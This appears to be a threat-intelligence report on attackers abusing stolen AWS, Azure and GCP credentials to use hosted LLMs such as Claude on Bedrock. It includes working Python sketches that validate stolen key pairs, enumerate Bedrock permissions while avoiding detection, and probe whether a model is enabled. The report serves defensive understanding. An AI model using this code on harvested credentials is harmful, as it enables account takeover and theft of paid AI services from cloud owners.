Threat actors are attempting to monetize their illicit access to LLMs while the cloud account owner bears the costs. The attackers target a variety of LLM services across AWS, Azure, and GCP. In some instances, they use a script to automate validating the stolen credentials and enumerating the permissions attached to them across multiple AI services, without running any actual queries (most likely to avoid detection).
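The checker itself has not been published, but a minimal sketch of that approach against AWS Bedrock might look like the following. This is an illustration under stated assumptions, not recovered attacker code: the function name `check_keys`, the candidate key pair, and the region are all placeholders; the calls themselves (`sts:GetCallerIdentity`, `bedrock:ListFoundationModels`) are real, read-only APIs that validate credentials and enumerate access without invoking a model.

```python
import boto3
from botocore.exceptions import ClientError

def check_keys(access_key, secret_key, region="us-east-1"):
    """Validate a stolen key pair and probe Bedrock permissions
    without ever invoking a model (i.e., no billable queries)."""
    session = boto3.Session(
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_key,
        region_name=region,
    )
    try:
        # Cheap validity check: confirms the keys work at all.
        identity = session.client("sts").get_caller_identity()
    except ClientError:
        return None  # invalid or revoked credentials

    perms = {"arn": identity["Arn"], "bedrock:ListFoundationModels": False}
    try:
        # Read-only enumeration: lists available models without running one.
        session.client("bedrock").list_foundation_models()
        perms["bedrock:ListFoundationModels"] = True
    except ClientError:
        pass
    return perms
```

In practice, usage would amount to iterating a function like this over a list of harvested key pairs and recording which ones are both valid and Bedrock-capable.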
In one observed incident involving this technique, the threat actor leveraged stolen cloud credentials obtained by exploiting a vulnerable, publicly exposed instance of Laravel (CVE-2021-3129). This initial access allowed them to exfiltrate cloud credentials and attempt to reach hosted LLMs, specifically targeting Anthropic's Claude (v2/v3) models. The attackers employed OAI Reverse Proxy, an open-source reverse proxy for LLM usage, to manage access to multiple compromised accounts without exposing the underlying credentials. They then tested the extent of their access with API requests, calling the InvokeModel API to confirm that the LLM service was activated.
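A hedged sketch of such an activation probe against Bedrock follows. The function name `claude_enabled` and the single-token prompt are assumptions for illustration; the model ID and request body follow Bedrock's documented Claude v2 text-completions format, and the error handling reflects Bedrock's behavior of returning an access-denied error when model access has not been granted.

```python
import json

import boto3
from botocore.exceptions import ClientError

def claude_enabled(session: boto3.Session, region="us-east-1",
                   model_id="anthropic.claude-v2"):
    """Send a minimal InvokeModel request to check whether the Claude
    model is activated (and therefore usable) on this account."""
    runtime = session.client("bedrock-runtime", region_name=region)
    body = json.dumps({
        "prompt": "\n\nHuman: hi\n\nAssistant:",
        "max_tokens_to_sample": 1,  # keep the probe as cheap as possible
    })
    try:
        runtime.invoke_model(modelId=model_id, body=body,
                             contentType="application/json",
                             accept="application/json")
        return True  # the model answered: the service is active
    except ClientError as e:
        if e.response["Error"]["Code"] == "AccessDeniedException":
            return False  # model access not granted in this account/region
        raise  # other errors (throttling, validation) need a closer look
```

Note that a success here is itself a billable inference, which is why the earlier credential-validation step avoided running queries entirely.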